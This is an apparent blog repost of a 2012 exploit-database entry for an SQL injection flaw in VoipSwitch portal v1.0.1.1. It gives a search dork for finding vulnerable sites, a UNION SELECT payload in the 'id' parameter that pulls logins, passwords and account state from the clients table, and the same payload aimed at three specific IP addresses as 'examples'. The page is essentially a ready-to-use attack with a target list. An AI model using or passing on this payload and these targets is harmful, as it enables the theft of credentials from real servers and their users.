[webapps / 0day] – voipswitch SQL Injection Vulnerability | Information Security News and Exploits

[webapps / 0day] – voipswitch SQL Injection Vulnerability

Jun.11, 2012 in Exploits

# Exploit Title: [voipswitch SQL Injection Vulnerability ]

# Google Dork: [voipswitch portal v. 1.0.1.1]
# Date: [11-06-2012]
# Exploit Author: [Sc4nX] – sc4nx@yahoo.com
# Software Link: [http://webtopicture.com/download/download-voipswitch-portal-....html]
# Version: [v. 1.0.1.1]
# Tested on: [win7]

[+] Vulnerability

http://host/portal/Sites/Newses/Newses.aspx?id=[vul]

[+] Exploit

http://host/portal/Sites/Newses/Newses.aspx?id=1%20%20union%20select%201,concat%28login,char%2858%29,password,char%2858%29,account_state%29,3,4,5%20from%20clientse164–

[+] example

http://66.36.229.158/portal/Sites/Newses/Newses.aspx?id=1%20%20union%20select%201,concat%28login,char%2858%29,password,char%2858%29,account_state%29,3,4,5%20from%20clientse164–

http://209.172.57.49/portal/Sites/Newses/Newses.aspx?id=1%20%20union%20select%201,concat%28login,char%2858%29,password,char%2858%29,account_state%29,3,4,5%20from%20clientse164–

http://122.155.0.10/web/Sites/Newses/Newses.aspx?id=1%20%20union%20select%201,concat%28login,char%2858%29,password,char%2858%29,account_state%29,3,4,5%20from%20clientse164–

Gz : CodeZero – DarkMado – Mr_Spammer All Mmembers Sec4ever

# [1337day.com][1] [2012-06-11]

[1]: http://1337day.com/

Source: http://1337day.com/exploits/18568

Quote

We use Linux for all our mission-critical applications. Having the source code means that we are not held hostage by anyone's support department.

Categories
- Exploits
- News

Information Security News and Exploits

Providing you with Security News and Exploits from all over the web.

[webapps / 0day] – voipswitch SQL Injection Vulnerability

Leave a Reply

Quote

Categories

Calendar

Recent Posts

M	T	W	T	F	S	S
« May				Jul »
				1	2	3
4	5	6	7	8	9	10
11	12	13	14	15	16	17
18	19	20	21	22	23	24
25	26	27	28	29	30